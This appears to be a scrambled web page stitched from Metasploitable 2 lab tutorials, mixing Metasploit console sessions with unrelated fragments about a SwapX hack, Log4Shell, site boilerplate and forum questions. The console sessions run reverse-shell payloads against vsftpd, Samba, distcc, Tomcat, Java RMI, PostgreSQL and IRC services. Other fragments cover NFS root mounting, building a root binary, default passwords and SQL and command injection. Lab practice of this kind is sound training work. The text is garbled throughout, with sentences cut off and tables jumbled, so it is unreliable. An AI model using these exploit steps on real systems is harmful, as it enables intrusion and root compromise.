---- --------------- -------- ----------- Getting access to a system with a writeable filesystem like this is trivial. Now we narrow our focus and use Metasploit to exploit the ssh vulnerabilities. [*] B: "f8rjvIDZRdKBtu0F\r\n" LHOST => This is the action page. Name Current Setting Required Description In Part 1 of this article we covered some examples of Service vulnerabilities, Server backdoors, and Web Application vulnerabilities. [*] A is input 0 Automatic Step 2: Vulnerability Assessment. They are input on the add to your blog page. [*] Attempting to automatically select a target Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. whoami [*] Reading from socket B This document outlines many of the security flaws in the Metasploitable 2 image. The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. [*] Successfully sent exploit request At first, open the Metasploit console and go to Applications Exploit Tools Armitage. SRVHOST yes The local host to listen on. Metasploitable 2 is designed to be vulnerable in order to work as a sandbox to learn security. . In the online forums some people think this issue is due to a problem with Metasploit 6 whilst Metasploit 5 does not have this issue. Name Current Setting Required Description msf exploit(vsftpd_234_backdoor) > show options Highlighted in red underline is the version of Metasploit. gcc root.c -o rootme (This will compile the C file to executable binary) Step 12: Copy the compiled binary to the msfadmin directory in NFS share. You can view CVE vulnerability details, exploits, references, metasploit modules, full list of vulnerable products and cvss score reports and vulnerability trends over time (e.g. Enable hints in the application by click the "Toggle Hints" button on the menu bar: The Mutillidae application contains at least the following vulnerabilities on these respective pages: SQL Injection on blog entrySQL Injection on logged in user nameCross site scripting on blog entryCross site scripting on logged in user nameLog injection on logged in user nameCSRFJavaScript validation bypassXSS in the form title via logged in usernameThe show-hints cookie can be changed by user to enable hints even though they are not supposed to show in secure mode, System file compromiseLoad any page from any site, XSS via referer HTTP headerJS Injection via referer HTTP headerXSS via user-agent string HTTP header, Contains unencrytped database credentials. The example below using rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. The purpose of this video is to create virtual networking environment to learn more about ethical hacking using Metasploit framework available in Kali Linux.. [*] Command: echo ZeiYbclsufvu4LGM; Using default colormap which is TrueColor. Exploiting All Remote Vulnerability In Metasploitable - 2. Access To access the vulnerable application, point your browser on Metasploitable3 to http://localhost:8282/struts2-rest-showcase To access the Apache Tomcat Manager, point your browser on Metasploitable3 to http://localhost:8282. Proxies no Use a proxy chain IP address are assigned starting from "101". [*] Meterpreter session, using get_processes to find netlink pid msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact [*] Matching RHOST yes The target address RHOST => -- ---- Meterpreter sessions will autodetect Ultimately they all fall flat in certain areas. RHOSTS yes The target address range or CIDR identifier USERNAME => tomcat In this article, we'll look at how this framework within Kali Linux can be used to attack a Windows 10 machine. Metasploitable 2 has deliberately vulnerable web applications pre-installed. LHOST => The payload is uploaded using a PUT request as a WAR archive comprising a jsp application. A reinstall of Metasploit was next attempted: Following the reinstall the exploit was run against with the same settings: This seemed to be a partial success a Command Shell session was generated and able to be invoked via the sessions 1 command. [*] Reading from sockets WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) For network clients, it acknowledges and runs compilation tasks. In Cisco Prime LAN Management Solution, this vulnerability is reported to exist but may be present on any host that is not configured appropriately. Unlike other vulnerable virtual machines, Metasploitable focuses on vulnerabilities at the operating system and network services layer instead of custom, vulnerable . msf exploit(usermap_script) > set RHOST Module options (exploit/linux/misc/drb_remote_codeexec): Have you used Metasploitable to practice Penetration Testing? Metasploit has a module to exploit this in order to gain an interactive shell, as shown below. This must be an address on the local machine or I am new to penetration testing . [*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp In the next section, we will walk through some of these vectors. It gives you everything you need from scanners to third-party integrations that you will need throughout an entire penetration testing lifecycle. The VictimsVirtual Machine has been established, but at this stage, some sets are required to launch the machine. msf auxiliary(postgres_login) > run Return to the VirtualBox Wizard now. Were going to exploit it and get a shell: Due to a random number generator vulnerability, the OpenSSL software installed on the system is susceptible to a brute-force attack. RHOST => msf auxiliary(smb_version) > show options What is Nessus? Module options (exploit/unix/ftp/vsftpd_234_backdoor): Description. Metasploitable is a Linux virtual machine that is intentionally vulnerable. Metasploitable 3 is a build-it-on-your-own-system operating system. [*] Writing to socket B Name Current Setting Required Description RHOSTS => For instance, to use native Windows payloads, you need to pick the Windows target. In Metasploit, an exploit is available for the vsftpd version. [*] is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP) [*] instance eval failed, trying to exploit syscall Module options (auxiliary/scanner/postgres/postgres_login): payload => cmd/unix/reverse RPORT 21 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host Use TWiki to run a project development space, a document management system, a knowledge base or any other groupware tool on either on an intranet or on the Internet. msf exploit(tomcat_mgr_deploy) > set RHOST Getting started [*] Writing exploit executable (1879 bytes) to /tmp/DQDnKUFLzR msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat Name Current Setting Required Description LHOST yes The listen address If a username is sent that ends in the sequence :) [ a happy face ], the backdoored version will open a listening shell on port 6200. payload => java/meterpreter/reverse_tcp What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. https://information.rapid7.com/download-metasploitable-2017.html. In additional to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible password security for both system and database server accounts. Lets move on. RHOSTS => -- ---- RPORT 80 yes The target port Closed 6 years ago. You can edit any TWiki page. Step 2: Basic Injection. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. The two dashes then comment out the remaining Password validation within the executed SQL statement. =================== Module options (exploit/multi/http/tomcat_mgr_deploy): ---- --------------- -------- ----------- A Computer Science portal for geeks. msf exploit(postgres_payload) > set LHOST LHOST => msf exploit(distcc_exec) > set payload cmd/unix/reverse Name Current Setting Required Description [*] Matching root,, Kali Linux VPN Options and Installation Walkthrough, Feroxbuster And Why It Is The Best Forced Browsing Attack Tool, How to Bypass Software Security Checks Through Reverse Engineering, Ethical Hacking Practice Test 6 Footprinting Fundamentals Level1, CEH Practice Test 5 Footprinting Fundamentals Level 0. SRVPORT 8080 yes The local port to listen on. ---- --------------- -------- ----------- From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner. [*] Uploading 13833 bytes as RuoE02Uo7DeSsaVp7nmb79cq.war [*] B: "ZeiYbclsufvu4LGM\r\n" [*] B: "D0Yvs2n6TnTUDmPF\r\n" Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres. [*] Command: echo VhuwDGXAoBmUMNcg; Copyright (c) 2000, 2021, Oracle and/or its affiliates. In this lab we learned how to perform reconnaissance on a target to discover potential system vulnerabilities. On Linux multiple commands can be run after each other using ; as a delimiter: These results are obtained using the following string in the form field: The above string breaks down into these commands being executed: The above demonstrates that havoc could be raised on the remote server by exploiting the above vulnerability. Module options (exploit/multi/misc/java_rmi_server): It contains well written, well thought and well explained computer science and programming articles, quizzes and practice/competitive programming/company interview Questions. Module options (exploit/unix/misc/distcc_exec): [*] Found shell. By discovering the list of users on this system, either by using another flaw to capture the passwd file, or by enumerating these user IDs via Samba, a brute force attack can be used to quickly access multiple user accounts. 0 Automatic VERBOSE true yes Whether to print output for all attempts To make this step easier, both Nessus and Rapid7 NexPose scanners are used locate potential vulnerabilities for each service. On July 3, 2011, this backdoor was eliminated. Luckily, the Metasploit team is aware of this and released a vulnerable VMware virtual machine called 'Metasploitable'. Exploit target: [*] Backgrounding session 1 [*] Started reverse handler on [*] Reading from sockets ---- --------------- -------- ----------- According to the most recent available information, this backdoor was added to the vsftpd-2.3.4.tar.gz archive between June 30, 2011, and July 1, 2011. We can now look into the databases and get whatever data we may like. This setup included an attacker using Kali Linux and a target using the Linux-based Metasploitable. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. msf auxiliary(smb_version) > run RHOST yes The target address Sources referenced include OWASP (Open Web Application Security Project) amongst others. This allows remote access to the host for convenience or remote administration. Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php. Attackers can implement arbitrary commands by defining a username that includes shell metacharacters. CISA and its partners, through the Joint Cyber Defense Collaborative, are responding to active, widespread exploitation of a critical remote code execution (RCE) vulnerability ( CVE-2021-44228) in Apache's Log4j software library, versions 2.0-beta9 to 2.14.1, known as "Log4Shell." Log4j is very broadly used in a variety of consumer and . RHOST => RHOST yes The target address Distccd is the server of the distributed compiler for distcc. msf > use exploit/multi/misc/java_rmi_server Using Exploits. :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp Id Name [*] Reading from socket B Here we examine Mutillidae which contains the OWASP Top Ten and more vulnerabilities. The first of which installed on Metasploitable2 is distccd. Payload options (cmd/unix/reverse): [*] Writing to socket B The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share. Step 3: Always True Scenario. msf exploit(unreal_ircd_3281_backdoor) > show options Step 3: Set the memory size to 512 MB, which is adequate for Metasploitable2. Exploit target: root, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(java_rmi_server) > set RHOST THREADS 1 yes The number of concurrent threads This particular version contains a backdoor that was slipped into the source code by an unknown intruder. PASSWORD => postgres RHOST => It comes with a large database of exploits for a variety of platforms and can be used to test the security of systems and look for vulnerabilities. Below is the homepage served from the web server on Metasploitable and accessed via Firefox on Kali Linux: Features of DVWA v1.0.7 accessible from the menu include: A More Info section is included on each of the vulnerability pages which contains links to additional resources about the vulnerability. Thus, we can infer that the port is TCP Wrapper protected. uname -a SESSION => 1 [*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp VHOST no HTTP server virtual host Name Disclosure Date Rank Description A command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 is exploited by this module while using the non-default Username Map Script configuration option. Step 5: Select your Virtual Machine and click the Setting button. Step 1:Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux. The applications are installed in Metasploitable 2 in the /var/www directory. Therefore, well stop here. The Nessus scan showed that the password password is used by the server. The FTP server has since been fixed but here is how the affected version could be exploited: In the previous section we identified that the FTP service was running on port 21, so lets try to access it via telnet: This vulnerability can also be exploited using the Metasploit framework using the VSFTPD v2.3.4 Backdoor Command Execution. I thought about closing ports but i read it isn't possible without killing processes. The Metasploit Framework from Rapid7 is one of the best-known frameworks in the area of vulnerability analysis, and is used by many Red Teams and penetration testers worldwide. [*] B: "qcHh6jsH8rZghWdi\r\n" Backdoors - A few programs and services have been backdoored. [*] Scanned 1 of 1 hosts (100% complete) There are the following kinds of vulnerabilities in Metasploitable 2- Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system. msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat msf exploit(postgres_payload) > show options Module options (auxiliary/admin/http/tomcat_administration): [*] Command shell session 2 opened ( -> at 2021-02-06 17:31:48 +0300 [*] Scanned 1 of 1 hosts (100% complete) We performed a Nessus scan against the target, and a critical vulnerability on this port ispresent: rsh Unauthenticated Access (via finger Information). [*] Writing to socket B msf exploit(vsftpd_234_backdoor) > show payloads Once you open the Metasploit console, you will get to see the following screen. tomcat55, msf > use exploit/linux/misc/drb_remote_codeexec msf exploit(twiki_history) > exploit [*] Started reverse handler on The Mutillidae web application (NOWASP (Mutillidae)) contains all of the vulnerabilities from the OWASP Top Ten plus a number of other vulnerabilities such as HTML-5 web storage, forms caching, and click-jacking. The nmap command uses a few flags to conduct the initial scan. PASSWORD no The Password for the specified username USERNAME no The username to authenticate as 5.port 1524 (Ingres database backdoor ) It is a pre-built virtual machine, and therefore it is simple to install. daemon, whereis nc Oracle is a registered trademark of Oracle Corporation and/or its, affiliates. This is Bypassing Authentication via SQL Injection. Step 8: Display all the user tables in information_schema. Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target. [+] UID: uid=0(root) gid=0(root) These backdoors can be used to gain access to the OS. ---- --------------- -------- ----------- Login with the above credentials. So, lets set it up: mkdir /metafs # this will be the mount point, mount -t nfs /metafs -o nolock # mount the remote shared directory as nfs and disable file locking. SSLCert no Path to a custom SSL certificate (default is randomly generated) Next we can mount the Metasploitable file system so that it is accessible from within Kali: This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers. Help Command The command will return the configuration for eth0. ---- --------------- -------- ----------- It aids the penetration testers in choosing and configuring of exploits. Module options (exploit/unix/webapp/twiki_history): Need to report an Escalation or a Breach? BLANK_PASSWORDS false no Try blank passwords for all users RHOSTS yes The target address range or CIDR identifier [*] Transmitting intermediate stager for over-sized stage(100 bytes) For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide. This is Metasploitable2 (Linux) Metasploitable is an intentionally vulnerable Linux virtual machine. [*] Accepted the second client connection [*] Auxiliary module execution completed, msf > use exploit/unix/webapp/twiki_history whoami Id Name PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) LPORT 4444 yes The listen port 0 Automatic Target Accessing it is easy: In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. LPORT 4444 yes The listen port And this is what we get: RHOSTS yes The target address range or CIDR identifier This VM could be used to perform security training, evaluate security methods, and practice standard techniques for penetration testing. This version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" following by a system command to the server on any listening port. The next service we should look at is the Network File System (NFS). SQLi and XSS on the log are possibleGET for POST is possible because only reading POSTed variables is not enforced. The VNC service provides remote desktop access using the password password. [*] Writing to socket A RPORT 21 yes The target port Notice that it does not function against Java Management Extension (JMX) ports as they do not allow remote class loading unless some other RMI endpoint is active in the same Java process. Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit.This set of articles discusses the RED TEAM's tools and routes of attack. SRVPORT 8080 yes The local port to listen on. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. Module options (exploit/multi/misc/java_rmi_server): Since we noticed previously that the MySQL database was not secured by a password, were going to use a brute force auxiliary module to see whether we can get into it. Metasploitable 2 is a straight-up download. :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead. Exploit/Unix/Misc/Distcc_Exec ): [ * ] B: `` f8rjvIDZRdKBtu0F\r\n '' LHOST = > the payload uploaded! Request at first, open the Metasploit console and go to Applications exploit tools Armitage to blog! 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